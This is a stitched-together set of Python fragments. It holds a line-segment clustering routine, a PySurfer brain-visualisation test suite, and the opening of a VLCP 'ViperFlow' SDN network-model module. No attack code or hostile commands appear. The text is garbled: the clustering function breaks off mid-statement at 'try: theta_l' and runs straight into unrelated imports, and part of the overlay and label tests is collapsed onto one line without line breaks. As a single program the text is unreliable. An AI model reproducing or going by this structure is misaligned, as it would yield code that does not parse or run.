        connect_index_add = cluster_criterion(n_current, lines_col1, lines_col2)
        connect_index_current = connect_index_initial | connect_index_add
        order = 'continue'
        n_next = 0
        for x in connect_index_add:
            if x == 1:
                # recursive
                order_last, C, check_state_deeper, connect_index_deeper = iter_core(n_next, n_current, lines, check_state, connect_index_current, cluster_index, inherit_C)
                connect_index_current = connect_index_deeper | connect_index_current
                check_state = check_state_deeper | check_state
                if order_last == 'inherit C and continue':
                    inherit_C = C
                    order = 'inherit C and continue'
            n_next += 1
        return order, inherit_C, check_state, connect_index_current
    elif check_state[n_current] == 1:
        # this line is checked before, but not assigned with a cluster number
        # actually do nothing here
        C = None  # not used
        order = 'continue'
        return order, C, check_state, connect_index_initial
    elif check_state[n_current] == 2:
        # this line is checked before, and assigned with a cluster number
        # this part is useful if the criterion let line A connected to B, but cant let line B connect to A
        #print('inherit from old cluster!')
        #print(debug_c1(n_current, n_last, lines))
        C = cluster_index[n_current]
        # note: if the current process connects with more than 1 old cluster,
        # only the last C (cluster num) will be inherited, all previous C will be overwrite.
        # But connections from all old clusters will be added from the line below.
        connect_index_initial[np.where(cluster_index == C)] = 1  # connection from old cluster is added
        order = 'inherit C and continue'
        return order, C, check_state, connect_index_initial


def connect_lines(lines):
    """Cluster line segments into connected components.

    *lines* is an (N, 4) array of segments (x1, y1, x2, y2).  Each unvisited
    segment seeds a flood fill via iter_core; components that touch an already
    assigned cluster inherit its number, otherwise a fresh number is issued.
    Returns a length-N integer array of cluster labels renumbered to
    consecutive values starting at 1.
    """
    lines_col1 = lines[:, 0:2]
    lines_col2 = lines[:, 2:4]
    sample_num = lines.shape[0]
    cluster_index = np.zeros(sample_num, dtype=int)
    check_state = np.zeros(sample_num, dtype=int)
    n_current = 0
    for line in lines:
        connect_index_initial = np.zeros(sample_num, dtype=bool)
        connect_index_initial[n_current] = 1  # a segment always belongs to its own component
        inherit_C = 0
        # the first few lines are same as in iter_core
        if check_state[n_current] == 0:
            check_state[n_current] = 1
            connect_index_add = cluster_criterion(n_current, lines_col1, lines_col2)
            connect_index_current = connect_index_initial | connect_index_add
            order = 'set new cluster'
            n_next = 0
            for x in connect_index_add:
                if x == 1:
                    order_last, C, check_state_deeper, connect_index_deeper = iter_core(n_next, n_current, lines, check_state, connect_index_current, cluster_index, inherit_C)
                    connect_index_current = connect_index_deeper | connect_index_current
                    check_state = check_state_deeper | check_state
                    if order_last == 'inherit C and continue':
                        inherit_C = C
                        order = 'add to previous cluster'
                n_next += 1
            #### DEBUG
            if np.any(cluster_index[np.where(connect_index_current == 1)] > 0):
                print('warning: cluster override!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
                overrided_cluster = cluster_index[np.where(connect_index_current == 1)]
                if order == 'add to previous cluster':
                    if np.any(overrided_cluster == inherit_C):
                        print('-- cluster expand')
                    if np.any((overrided_cluster != inherit_C) & (overrided_cluster != 0)):
                        print('-- cluster rewrite')
                else:
                    print('-- override but no inherit detected!')
            ##
            if order == 'add to previous cluster':
                cluster_index[np.where(connect_index_current == 1)] = inherit_C
                check_state[np.where(connect_index_current == 1)] = 2
            else:  # means: not connect to previous cluster
                C = np.max(cluster_index) + 1  # set to a new cluster
                cluster_index[np.where(connect_index_current == 1)] = C
                check_state[np.where(connect_index_current == 1)] = 2
            #### DEBUG
            # after assignment nothing may remain in the half-visited state
            if np.any(check_state == 1):
                assert(0)
            ##
        #### DEBUG
        else:
            if check_state[n_current] == 1:
                assert(cluster_index[n_current] != 0)
            elif check_state[n_current] == 2:
                assert (cluster_index[n_current] != 0)
        ##
        n_current += 1
    #### DEBUG
    assert (not np.any(cluster_index == 0))  # every segment must have been labelled
    ##
    # compress cluster numbers to consecutive 1..k
    normalized_cluster_index = np.zeros_like(cluster_index)
    maximum = np.max(cluster_index)
    num = 1
    for x in range(maximum + 1):
        if np.any(cluster_index == x):
            normalized_cluster_index[np.where(cluster_index == x)] = num
            num += 1
    #print(cluster_index)
    #print('normalized_cluster_index: ',normalized_cluster_index)
    return normalized_cluster_index


def cluster_split_fit(points, points_new, threshold, max_loop=20):
    # fit the cluster with 2 lines
    # Splits *points* by the sign of points_new[:, 0] and least-squares fits a line to each half.
    rms_error_last = math.inf
    best_by_now_l, best_by_now_r = None, None
    best_by_now_l_length, best_by_now_r_length = None, None
    for x in range(max_loop):
        if x == max_loop - 1:  # iteration budget exhausted
            if best_by_now_l is not None and best_by_now_r is not None:
                print('split done, but not optimized!!!!!!!!!!!!!!!!!!!!!!!!!')
                return best_by_now_l, best_by_now_l_length, best_by_now_r, best_by_now_r_length, 'split done'
            else:
                print('cant split cluster!!!!!!!!!!!!!!!!!!!!!!!!!!')
                return [0,0,0,0], [0,0], [0,0,0,0], [0,0], 'cant split'
        group_left = points[np.where(points_new[:,0] < 0), :]
        group_right = points[np.where(points_new[:,0] > 0), :]
        group_left, group_right = group_left[0], group_right[0]
        [vx_l, vy_l, x0_l, y0_l] = cv2.fitLine(group_left, distType=cv2.cv2.DIST_L2, param=0, reps=0.01, aeps=0.01)
        [vx_r, vy_r, x0_r, y0_r] = cv2.fitLine(group_right, distType=cv2.cv2.DIST_L2, param=0, reps=0.01, aeps=0.01)
        x0_l, y0_l, x0_r, y0_r = x0_l[0], y0_l[0], x0_r[0], y0_r[0]
        # NOTE(review): chunk truncated below — the function continues past this excerpt.
        try:
            theta_l
import os
import os.path as op
from os.path import join as pjoin
import sys
import warnings
import pytest
from mayavi import mlab
import nibabel as nib
import numpy as np
from numpy.testing import assert_array_equal, assert_array_less
from unittest import SkipTest
from surfer import Brain, io, utils
from surfer.utils import requires_fsaverage, requires_imageio, requires_fs

warnings.simplefilter('always')

subject_id = 'fsaverage'
std_args = [subject_id, 'lh', 'inflated']
data_dir = pjoin(op.dirname(__file__), '..', '..', 'examples',
                 'example_data')
overlay_fname = pjoin(data_dir, 'lh.sig.nii.gz')


def _set_backend(backend=None):
    """Use testing backend for Windows."""
    # Force the non-rendering 'test' backend on Windows, and on Travis Linux
    # under Python 3, where real rendering crashes.
    only_test = (sys.platform == 'win32' or
                 (os.getenv('TRAVIS', 'false') == 'true' and
                  sys.platform == 'linux') and sys.version[0] == '3')
    if backend is None:
        backend = 'test' if only_test else 'auto'
    if only_test and backend != 'test':
        raise SkipTest('non-testing backend crashes on Windows and '
                       'Travis Py3k')
    mlab.options.backend = backend


def get_view(brain):
    """Setup for view persistence test"""
    fig = brain._figures[0][0]
    # the 'test' backend has no real camera, so view checks are skipped
    if mlab.options.backend == 'test':
        return
    fig.scene.camera.parallel_scale = 50
    assert fig.scene.camera.parallel_scale == 50
    view, roll = brain.show_view()
    return fig.scene.camera.parallel_scale, view, roll


def check_view(brain, view):
    """Test view persistence"""
    fig = brain._figures[0][0]
    # under the 'test' backend get_view returned None, so there is nothing to check
    if mlab.options.backend == 'test':
        return
    parallel_scale, view, roll = view
    assert fig.scene.camera.parallel_scale == parallel_scale
    view_now, roll_now = brain.show_view()
    assert view_now[:3] == view[:3]
    assert_array_equal(view_now[3], view[3])
    assert roll_now == roll


@requires_fsaverage()
def test_offscreen():
    """Test offscreen rendering."""
    _set_backend()
    brain = Brain(*std_args, offscreen=True)
    shot = brain.screenshot()
    # screenshot size depends on the platform's window manager; only bound it
    assert_array_less((400, 400, 2), shot.shape)
    assert_array_less(shot.shape, (801, 801, 4))
    brain.close()


@requires_fsaverage()
def test_image(tmpdir):
    """Test image saving."""
    tmp_name = tmpdir.join('temp.png')
    tmp_name = str(tmp_name)  # coerce to str to avoid PIL error
    _set_backend()
    subject_id, _, surf = std_args  # NOTE: shadows the module-level subject_id
    brain = Brain(subject_id, 'both', surf=surf, size=100)
    brain.add_overlay(overlay_fname, hemi='lh', min=5, max=20, sign="pos")
    brain.save_imageset(tmp_name, ['med', 'lat'], 'jpg')
    brain.close()
    brain = Brain(*std_args, size=100)
    brain.save_image(tmp_name)
    brain.save_image(tmp_name, 'rgba', True)
    brain.screenshot()
    if os.getenv('TRAVIS', '') != 'true':
        # for some reason these fail on Travis sometimes
        brain.save_montage(tmp_name, ['l', 'v', 'm'], orientation='v')
        brain.save_montage(tmp_name, ['l', 'v', 'm'], orientation='h')
        brain.save_montage(tmp_name, [['l', 'v'], ['m', 'f']])
    brain.close()


@requires_fsaverage()
def test_brains():
    """Test plotting of Brain with different arguments."""
    # testing backend breaks when passing in a figure, so we use 'auto' here
    # (shouldn't affect usability, but it makes testing more annoying)
    _set_backend('auto')
    with warnings.catch_warnings(record=True):  # traits for mlab.figure()
        mlab.figure(101)
    # parallel lists: one Brain construction per index
    surfs = ['inflated', 'white', 'white', 'white', 'white', 'white',
             'white']
    hemis = ['lh', 'rh', 'both', 'both', 'rh', 'both', 'both']
    titles = [None, 'Hello', 'Good bye!', 'lut test', 'dict test',
              'None test', 'RGB test']
    cortices = ["low_contrast", ("Reds", 0, 1, False), 'hotpink',
                ['yellow', 'blue'], dict(colormap='Greys'), None,
                (0.5, 0.5, 0.5)]
    sizes = [500, (400, 300), (300, 300), (300, 400), 500, 400, 300]
    backgrounds = ["white", "blue", "black", "0.75", (0.2, 0.2, 0.2),
                   "black", "0.75"]
    foregrounds = ["black", "white", "0.75", "red", (0.2, 0.2, 0.2),
                   "blue", "black"]
    with warnings.catch_warnings(record=True):  # traits for mlab.figure()
        figs = [101, mlab.figure(), None, None, mlab.figure(), None, None]
    subj_dir = utils._get_subjects_dir()
    subj_dirs = [None, subj_dir, subj_dir, subj_dir, subj_dir, subj_dir,
                 subj_dir]
    alphas = [1.0, 0.5, 0.25, 0.7, 0.5, 0.25, 0.7]
    for surf, hemi, title, cort, s, bg, fg, fig, sd, alpha \
            in zip(surfs, hemis, titles, cortices, sizes, backgrounds,
                   foregrounds, figs, subj_dirs, alphas):
        brain = Brain(subject_id, hemi, surf, title=title, cortex=cort,
                      alpha=alpha, size=s, background=bg, foreground=fg,
                      figure=fig, subjects_dir=sd)
        with np.errstate(invalid='ignore'):  # encountered in double_scalars
            brain.set_distance()
        brain.close()
    # reuses the loop variables from the last iteration above
    brain = Brain(subject_id, hemi, surf, subjects_dir=sd,
                  interaction='terrain')
    brain.close()
    pytest.raises(ValueError, Brain, subject_id, 'lh', 'inflated',
                  subjects_dir='')
    pytest.raises(ValueError, Brain, subject_id, 'lh', 'inflated',
                  interaction='foo', subjects_dir=sd)


@requires_fsaverage()
def test_annot():
    """Test plotting of annot."""
    _set_backend()
    annots = ['aparc', 'aparc.a2005s']
    borders = [True, False, 2]
    alphas = [1, 0.5]
    brain = Brain(*std_args)
    view = get_view(brain)
    # zip stops at the shortest list, so only two combinations are plotted
    for a, b, p in zip(annots, borders, alphas):
        brain.add_annotation(a, b, p)
    check_view(brain, view)
    brain.set_surf('white')
    with pytest.raises(ValueError):
        brain.add_annotation('aparc', borders=-1)
    subj_dir = utils._get_subjects_dir()
    annot_path = pjoin(subj_dir, subject_id, 'label', 'lh.aparc.a2009s.annot')
    labels, ctab, names = nib.freesurfer.read_annot(annot_path)
    brain.add_annotation((labels, ctab))
    brain.close()


@requires_fsaverage()
def test_contour():
    """Test plotting of contour overlay."""
    _set_backend()
    brain = Brain(*std_args)
    view = get_view(brain)
    overlay_file = pjoin(data_dir, "lh.sig.nii.gz")
    brain.add_contour_overlay(overlay_file)
    # adding a second contour overlay replaces the first
    brain.add_contour_overlay(overlay_file, max=20, n_contours=9,
                              line_width=2)
    brain.contour['surface'].actor.property.line_width = 1
    brain.contour['surface'].contour.number_of_contours = 10
    check_view(brain, view)
    brain.close()


@requires_fsaverage()
@requires_fs()
def test_data():
    """Test plotting of data."""
    _set_backend()
    brain = Brain(*std_args)
    mri_file = pjoin(data_dir, 'resting_corr.nii.gz')
    reg_file = pjoin(data_dir, 'register.dat')
    surf_data = io.project_volume_data(mri_file, "lh", reg_file)
    brain.add_data(surf_data, -.7, .7, colormap="jet", alpha=.7)
    brain.set_surf('white')
    # empty data with empty vertices must be accepted as a no-op layer
    brain.add_data([], vertices=np.array([], int))
    brain.close()


@requires_fsaverage()
def test_data_limits():
    """Test handling of data limits."""
    _set_backend()
    brain = Brain(*std_args)
    surf_data = np.zeros(163842)  # fsaverage vertex count per hemisphere
    # equal min/max must be rejected
    pytest.raises(ValueError, brain.add_data, surf_data, 0, 0)
    brain.add_data(surf_data, 0, 1)
    brain.close()


@requires_fsaverage()
def test_foci():
    """Test plotting of foci."""
    _set_backend('test')
    brain = Brain(*std_args)
    coords = [[-36, 18, -3],
              [-43, 25, 24],
              [-48, 26, -2]]
    brain.add_foci(coords, map_surface="white", color="gold", name='test1')
    subj_dir = utils._get_subjects_dir()
    annot_path = pjoin(subj_dir, subject_id, 'label', 'lh.aparc.a2009s.annot')
    ids, ctab, names = nib.freesurfer.read_annot(annot_path)
    verts = np.arange(0, len(ids))
    coords = np.random.permutation(verts[ids == 74])[:10]  # 10 random vertices in region 74
    scale_factor = 0.7
    brain.add_foci(coords, coords_as_verts=True,
                   scale_factor=scale_factor, color="#A52A2A", name='test2')
    with pytest.raises(ValueError):
        brain.remove_foci(['test4'])  # unknown name must raise
    brain.remove_foci('test1')
    brain.remove_foci()  # removes all remaining foci sets
    assert len(brain.foci_dict) == 0
    brain.close()


@requires_fsaverage()
def test_label():
    """Test plotting of label."""
    _set_backend()
    subject_id = "fsaverage"  # NOTE: shadows the module-level subject_id
    hemi = "lh"
    surf = "inflated"
    brain = Brain(subject_id, hemi, surf)
    view = get_view(brain)
    brain.add_label("BA1")
    check_view(brain, view)
    brain.add_label("BA1", color="blue", scalar_thresh=.5)
    subj_dir = utils._get_subjects_dir()
    label_file = pjoin(subj_dir, subject_id,
                       "label", "%s.MT.label" % hemi)
    brain.add_label(label_file)
    brain.add_label("BA44", borders=True)
    brain.add_label("BA6", alpha=.7)
    brain.show_view("medial")
    brain.add_label("V1", color="steelblue", alpha=.6)
    brain.add_label("V2", color="#FF6347", alpha=.6)
    brain.add_label("entorhinal", color=(.2, 1, .5), alpha=.6)
    brain.set_surf('white')
    brain.show_view(dict(elevation=40, distance=430), distance=430)
    # conflicting distance arguments must raise (error message contains '!=')
    with pytest.raises(ValueError, match='!='):
        brain.show_view(dict(elevation=40, distance=430), distance=431)
    # remove labels
    brain.remove_labels('V1')
    assert 'V2' in brain.labels_dict
    assert 'V1' not in brain.labels_dict
    brain.remove_labels()
    assert 'V2' not in brain.labels_dict
    brain.close()


@requires_fsaverage()
def test_meg_inverse():
    """Test plotting of MEG inverse solution."""
    _set_backend()
    brain = Brain(*std_args)
    stc_fname = os.path.join(data_dir, 'meg_source_estimate-lh.stc')
    stc = io.read_stc(stc_fname)
    vertices = stc['vertices']
    colormap = 'hot'
    data = stc['data']
    # vector-valued variant: scale the vertex normals by the scalar data
    data_full = (brain.geo['lh'].nn[vertices][..., np.newaxis] *
                 data[:, np.newaxis])
    time = np.linspace(stc['tmin'], stc['tmin'] + data.shape[1] * stc['tstep'],
                       data.shape[1], endpoint=False)

    def time_label(t):
        return 'time=%0.2f ms' % (1e3 * t)

    # scalar and vector data layers go through the same code path
    for use_data in (data, data_full):
        brain.add_data(use_data, colormap=colormap, vertices=vertices,
                       smoothing_steps=1, time=time, time_label=time_label)

    brain.scale_data_colormap(fmin=13, fmid=18, fmax=22, transparent=True)
    assert brain.data_dict['lh']['time_idx'] == 0
    brain.set_time(.1)
    assert brain.data_dict['lh']['time_idx'] == 2
    # viewer = TimeViewer(brain)

    # multiple data layers
    # mismatched time axis length must raise
    pytest.raises(ValueError, brain.add_data, data, vertices=vertices,
                  time=time[:-1])
    brain.add_data(data, colormap=colormap, vertices=vertices,
                   smoothing_steps=1, time=time, time_label=time_label,
                   initial_time=.09)
    assert brain.data_dict['lh']['time_idx'] == 1
    data_dicts = brain._data_dicts['lh']
    assert len(data_dicts) == 3
    assert data_dicts[0]['time_idx'] == 1
    assert data_dicts[1]['time_idx'] == 1

    # shift time in both layers
    brain.set_data_time_index(0)
    assert data_dicts[0]['time_idx'] == 0
    assert data_dicts[1]['time_idx'] == 0
    brain.set_data_smoothing_steps(2)

    # add second data-layer without time axis
    brain.add_data(data[:, 1], colormap=colormap, vertices=vertices,
                   smoothing_steps=2)
    brain.set_data_time_index(2)
    assert len(data_dicts) == 4

    # change surface
    brain.set_surf('white')

    # remove all layers
    brain.remove_data()
    assert brain._data_dicts['lh'] == []
    brain.close()


@requires_fsaverage()
def test_morphometry():
    """Test plotting of morphometry."""
    _set_backend()
    brain = Brain(*std_args)
    brain.add_morphometry("curv")
    brain.add_morphometry("sulc", grayscale=True)
    brain.add_morphometry("thickness")
    brain.close()


@requires_imageio()
@requires_fsaverage()
def test_movie(tmpdir):
    """Test saving a movie of an MEG inverse solution."""
    import imageio

    # create and setup the Brain instance
    _set_backend()
    brain = Brain(*std_args)
    stc_fname = os.path.join(data_dir, 'meg_source_estimate-lh.stc')
    stc = io.read_stc(stc_fname)
    data = stc['data']
    time = np.arange(data.shape[1]) * stc['tstep'] + stc['tmin']
    brain.add_data(data, colormap='hot', vertices=stc['vertices'],
                   smoothing_steps=10, time=time, time_label='time=%0.2f ms')
    brain.scale_data_colormap(fmin=13, fmid=18, fmax=22, transparent=True)

    # save movies with different options
    dst = str(tmpdir.join('test.mov'))
    # test the number of frames in the movie
    brain.save_movie(dst)
    frames = imageio.mimread(dst)
    assert len(frames) == 2
    brain.save_movie(dst, time_dilation=10)
    frames = imageio.mimread(dst)
    assert len(frames) == 7
    brain.save_movie(dst, tmin=0.081, tmax=0.102)
    frames = imageio.mimread(dst)
    assert len(frames) == 2
    brain.close()


@requires_fsaverage()
def test_overlay():
    """Test plotting of overlay."""
    _set_backend()
    # basic overlay support
    overlay_file = pjoin(data_dir, "lh.sig.nii.gz")
    brain = Brain(*std_args)
    brain.add_overlay(overlay_file)
    brain.overlays["sig"].remove()
    brain.add_overlay(overlay_file, min=5, max=20, sign="pos")
    sig1 = io.read_scalar_data(pjoin(data_dir, "lh.sig.nii.gz"))
    # sig2 is not used in the visible portion — the file continues past this excerpt
    sig2 = io.read_scalar_data(pjoin(data_dir, "lh.alt_sig.nii.gz"))

    # two-sided overlay
    brain.add_overlay(sig1, 4, 30, name="two-sided")
    overlay = brain.overlays_dict.pop('two-sided')[0]
    assert_array_equal(overlay.pos_bar.data_range, [4, 30])
    assert_array_equal(overlay.neg_bar.data_range, [-30, -4])
    # NOTE(review): chunk truncated below — test_overlay continues past this excerpt
    assert overlay.pos_bar.reverse_lut
assert not overlay.neg_bar.reverse_lut overlay.remove() thresh = 4 sig1[sig1 < thresh] = 0 sig2[sig2 < thresh] = 0 conjunct = np.min(np.vstack((sig1, sig2)), axis=0) brain.add_overlay(sig1, 4, 30, name="sig1") brain.overlays["sig1"].pos_bar.lut_mode = "Reds" brain.overlays["sig1"].pos_bar.visible = False brain.add_overlay(sig2, 4, 30, name="sig2") brain.overlays["sig2"].pos_bar.lut_mode = "Blues" brain.overlays["sig2"].pos_bar.visible = False brain.add_overlay(conjunct, 4, 30, name="conjunct") brain.overlays["conjunct"].pos_bar.lut_mode = "Purples" brain.overlays["conjunct"].pos_bar.visible = False brain.set_surf('white') brain.close() @requires_fsaverage() def test_probabilistic_labels(): """Test plotting of probabilistic labels.""" _set_backend() brain = Brain("fsaverage", "lh", "inflated", cortex="low_contrast") brain.add_label("BA1", color="darkblue") brain.add_label("BA1", color="dodgerblue", scalar_thresh=.5) brain.add_label("BA45", color="firebrick", borders=True) brain.add_label("BA45", color="salmon", borders=True, scalar_thresh=.5) subj_dir = utils._get_subjects_dir() label_file = pjoin(subj_dir, "fsaverage", "label", "lh.BA6.label") prob_field = np.zeros_like(brain.geo['lh'].x) ids, probs = nib.freesurfer.read_label(label_file, read_scalars=True) prob_field[ids] = probs brain.add_data(prob_field, thresh=1e-5) with warnings.catch_warnings(record=True): brain.data["colorbar"].number_of_colors = 10 brain.data["colorbar"].number_of_labels = 11 brain.close() @requires_fsaverage() def test_text(): """Test plotting of text.""" _set_backend('test') brain = Brain(*std_args) brain.add_text(0.1, 0.1, 'Hello', 'blah') brain.close() @requires_fsaverage() def test_animate(tmpdir): """Test animation.""" _set_backend('auto') brain = Brain(*std_args, size=100) brain.add_morphometry('curv') tmp_name = str(tmpdir.join('test.avi')) brain.animate(["m"] * 3, n_steps=2) brain.animate(['l', 'l'], n_steps=2, fname=tmp_name) # can't rotate in axial plane pytest.raises(ValueError, 
brain.animate, ['l', 'd']) brain.close() @requires_fsaverage() def test_views(): """Test showing different views.""" _set_backend('test') brain = Brain(*std_args) brain.show_view('lateral')
#!/usr/bin/python
#! --*-- utf-8 --*--
from vlcp.config import defaultconfig
from vlcp.server.module import Module,depend,call_api,api
from vlcp.event.runnable import RoutineContainer
from vlcp.utils.ethernet import ip4_addr
from vlcp.utils.dataobject import updater,\
                set_new,dump,ReferenceObject,\
                request_context, WeakReferenceObject
import vlcp.service.kvdb.objectdb as objectdb
from vlcp.utils.networkmodel import *
from vlcp.utils.netutils import ip_in_network, network_first, network_last,\
        parse_ip4_address, parse_ip4_network,\
        format_network_cidr
from uuid import uuid1
import copy
import logging
import itertools
from vlcp.utils.exceptions import AsyncTransactionLockException, WalkKeyNotRetrieved,\
    APIRejectedException
from collections import OrderedDict
from contextlib import suppress
from vlcp.utils.walkerlib import ensure_keys
from pychecktype.checked import checked
from vlcp.utils.typelib import ip_address_type, cidr_type, autoint, mac_address_type,\
    cidr_nonstrict_type
from pychecktype import tuple_, extra
from vlcp.utils.dhcp import dhcp_options_type

logger = logging.getLogger('viperflow')
#logger.setLevel(logging.DEBUG)


class UpdateConflictException(Exception):
    # Raised when a key-value DB transaction detects a conflicting update.
    def __init__(self,desc="db update conflict"):
        super(UpdateConflictException,self).__init__(desc)


def dispatch_walker(parameter_dict, walker_map, create, get_type):
    # Build a synchronous walker that groups the requested objects by their
    # physical-network type and delegates each group to the type-specific
    # walker from `walker_map`.
    #
    # parameter_dict: OrderedDict mapping object key -> request parameters
    # walker_map:     dict mapping type name -> walker callable
    # create:         True when the objects are being created (keys must be new)
    # get_type:       callable(key, value, walk, parameters=...) returning
    #                 (type, physicalnetwork_id)
    def _walker(walk, write, timestamp):
        # Collect type of each item and group into dict
        type_group = {}
        all_collected = True
        for key, parameters in parameter_dict.items():
            try:
                value = walk(key)
            except WalkKeyNotRetrieved:
                # key not yet available in this walk round; retry later
                all_collected = False
            else:
                if value is None:
                    if not create:
                        raise ValueError(key + " does not exist")
                else:
                    if create:
                        # Raise exception
                        set_new(value, value)
                try:
                    type_, physicalnetwork_id = get_type(key, value, walk, parameters=parameters)
                except WalkKeyNotRetrieved:
                    all_collected = False
                else:
                    if type_ in type_group:
                        type_group[type_][key] = (parameters, physicalnetwork_id)
                    else:
                        type_group[type_] = {key: (parameters, physicalnetwork_id)}
        if not all_collected:
            # wait for the next walk round with more keys retrieved
            return
        # Check if there are any types that are not in walker_map
        if any(t not in walker_map for t in type_group):
            # restart the async transaction with the discovered type grouping
            raise AsyncTransactionLockException(type_group)
        for t, d in type_group.items():
            walker_map[t](walk, write, timestamp, {k: v[0] for k, v in d.items()})
    return _walker


# --- (type, physicalnetwork_id) extractors used with dispatch_walker ---

def create_physicalnetwork_gettype(k, v, walk, parameters):
    # For creation the type comes from the request parameters.
    return parameters['type'], parameters['id']


def physicalnetwork_gettype(k, v, walk, parameters):
    # For update/delete the type comes from the stored object.
    return v.type, v.id


def create_physicalport_gettype(k, v, walk, parameters):
    # Resolve the owning physical network to find the type.
    phynet = walk(PhysicalNetwork.default_key(parameters['physicalnetwork']))
    if phynet is None:
        raise ValueError("Physical network " + parameters['physicalnetwork'] + ' not exists')
    return phynet.type, phynet.id


def create_physicalport_prekey(key, parameters):
    # Extra keys that must be retrieved before the type can be determined.
    return (PhysicalNetwork.default_key(parameters['physicalnetwork']),)


def physicalport_gettype(k, v, walk, parameters):
    phynet = walk(v.physicalnetwork.getkey())
    return phynet.type, phynet.id


# Logical networks reuse the physical-port resolution logic: the type is
# always taken from the owning physical network.
create_logicalnetwork_gettype = create_physicalport_gettype
create_logicalnetwork_prekey = create_physicalport_prekey
logicalnetwork_gettype = physicalport_gettype

# DHCP lease time: an integer number of seconds, the string 'infinite', or None
lease_time_type = (autoint, extra(str, check=lambda x: x == 'infinite'), None)


def dispatch_async_walker(parameter_dict, create, get_type, publicapi_, direct_get_type = False, pre_keys = None):
    # Build the async part of an asyncwritewalk: query the type-specific
    # plugin walkers through the 'public' API, then return the full key set
    # plus the synchronous walker from dispatch_walker.
    #
    # publicapi_:      name of the public API that returns (walker, key_func)
    #                  for a given network type
    # direct_get_type: True when get_type works from parameters alone
    #                  (no stored object needed), e.g. on creation
    # pre_keys:        optional callable(key, parameters) yielding extra keys
    #                  needed before the type can be determined
    async def _asyncwalker(last_info, container):
        walker_map = {}
        keys = set(parameter_dict)
        if last_info is None and direct_get_type:
            type_group = {}
            for key, parameters in parameter_dict.items():
                type_, physicalnetwork_id = get_type(key, None, None, parameters=parameters)
                if type_ in type_group:
                    type_group[type_][key] = (parameters, physicalnetwork_id)
                else:
                    type_group[type_] = {key: (parameters, physicalnetwork_id)}
            last_info = type_group
        if last_info is not None:
            for t, d in last_info.items():
                # Collect walker and keys from public API
                try:
                    walker, k_ = await call_api(container, 'public', publicapi_, {'type': t})
                except APIRejectedException:
                    raise ValueError("Physical network type %r is not supported, or the corresponding network plugin is not loaded" % (t,))
                for _, (parameters, phynet_id) in d.items():
                    # If it is not changed, this network is needed
                    # this reduces an extra retry
                    keys.add(PhysicalNetwork.default_key(phynet_id))
                if k_:
                    for _, (parameters, phynet_id) in d.items():
                        keys.update(k_(phynet_id, parameters))
                walker_map[t] = walker
        else:
            if pre_keys:
                for key, parameters in parameter_dict.items():
                    keys.update(pre_keys(key, parameters))
        return (tuple(keys), dispatch_walker(parameter_dict, walker_map, create, get_type))
    return _asyncwalker


@defaultconfig
@depend(objectdb.ObjectDB)
class ViperFlow(Module):
    """
    Standard network model for L2 SDN
    """
    def __init__(self,server):
        super(ViperFlow,self).__init__(server)
        self.app_routine = RoutineContainer(self.scheduler)
        # monotonically increasing counter used to build unique ObjectDB request ids
        self._reqid = 0
        self.createAPI(api(self.createphysicalnetwork,self.app_routine),
                       api(self.createphysicalnetworks,self.app_routine),
                       api(self.updatephysicalnetwork,self.app_routine),
                       api(self.updatephysicalnetworks,self.app_routine),
                       api(self.deletephysicalnetwork,self.app_routine),
                       api(self.deletephysicalnetworks,self.app_routine),
                       api(self.listphysicalnetworks,self.app_routine),
                       api(self.createphysicalport,self.app_routine),
                       api(self.createphysicalports,self.app_routine),
                       api(self.updatephysicalport,self.app_routine),
                       api(self.updatephysicalports,self.app_routine),
                       api(self.deletephysicalport,self.app_routine),
                       api(self.deletephysicalports,self.app_routine),
                       api(self.listphysicalports,self.app_routine),
                       api(self.createlogicalnetwork,self.app_routine),
                       api(self.createlogicalnetworks,self.app_routine),
                       api(self.updatelogicalnetwork,self.app_routine),
                       api(self.updatelogicalnetworks,self.app_routine),
                       api(self.deletelogicalnetwork,self.app_routine),
                       api(self.deletelogicalnetworks,self.app_routine),
                       api(self.listlogicalnetworks,self.app_routine),
                       api(self.createlogicalport,self.app_routine),
                       api(self.createlogicalports,self.app_routine),
                       api(self.updatelogicalport,self.app_routine),
                       api(self.updatelogicalports,self.app_routine),
                       api(self.deletelogicalport,self.app_routine),
                       api(self.deletelogicalports,self.app_routine),
                       api(self.listlogicalports,self.app_routine),
                       api(self.createsubnet,self.app_routine),
                       api(self.createsubnets,self.app_routine),
                       api(self.updatesubnet,self.app_routine),
                       api(self.updatesubnets,self.app_routine),
                       api(self.deletesubnet,self.app_routine),
                       api(self.deletesubnets,self.app_routine),
                       api(self.listsubnets,self.app_routine)
                       )

    async def _dumpkeys(self, keys, filter=None):
        # Fetch the objects for `keys` from ObjectDB and dump them to plain
        # dictionaries; when `filter` is given, keep only objects whose
        # attributes match every (key, value) pair.
        self._reqid += 1
        reqid = ('viperflow', self._reqid)
        with request_context(reqid, self.app_routine):
            retobjs = await call_api(self.app_routine,'objectdb','mget',{'keys':keys,'requestid':reqid})
            if filter is None:
                return [dump(o) for o in retobjs]
            else:
                return [dump(o) for o in retobjs
                        if o is not None and all(getattr(o, k, None) == v
                                                 for k, v in filter.items())]

    async def _dumpone(self, key, filter):
        # Convenience wrapper around _dumpkeys for a single key.
        return await self._dumpkeys([key], filter)

    async def createphysicalnetwork(self, type: str = 'vlan', id: (str, None) = None,
                                    **kwargs: {'?vnirange': [tuple_((int, int))],
                                               "?vlanrange": [tuple_((int, int))]}):
        """
        Create physical network.

        :param type: Network type, usually one of *vlan*, *vxlan*, *local*, *native*

        :param id: Specify the created physical network ID. If omitted or None, an UUID is
                   generated.

        :param \*\*kwargs: extended creation parameters. Look for the document of the
                           corresponding driver. Common options include:

                           vnirange
                              list of ``[start,end]`` ranges like ``[[1000,2000]]``. Both
                              *start* and *end* are included. It specifies the usable VNI
                              ranges for VXLAN network.

                           vlanrange
                              list of ``[start,end]`` ranges like ``[[1000,2000]]``. Both
                              *start* and *end* are included. It specifies the usable VLAN
                              tag ranges for VLAN network.

        :return: A dictionary of information of the created physical network.
        """
        if not id:
            id = str(uuid1())
        network = {'type':type,'id':id}
        network.update(kwargs)
        return await self.createphysicalnetworks([network])

    @checked
    async def createphysicalnetworks(self,networks: [{"?id": str, "type": str,
                                                      '?vnirange': [tuple_((int, int))],
                                                      "?vlanrange": [tuple_((int, int))]}]):
        """
        Create multiple physical networks in a transaction.

        :param networks: each should be a dictionary contains all the parameters in
                         ``createphysicalnetwork``

        :return: A list of dictionaries of information of the created physical networks.
        """
        #networks [{type='vlan' or 'vxlan',id = None or uuid1(),'vlanrange':[(100,200),(400,401)],kwargs}]
        parameter_dict = OrderedDict()
        # first check id is None, allocate for it
        # group by type, do it use type driver
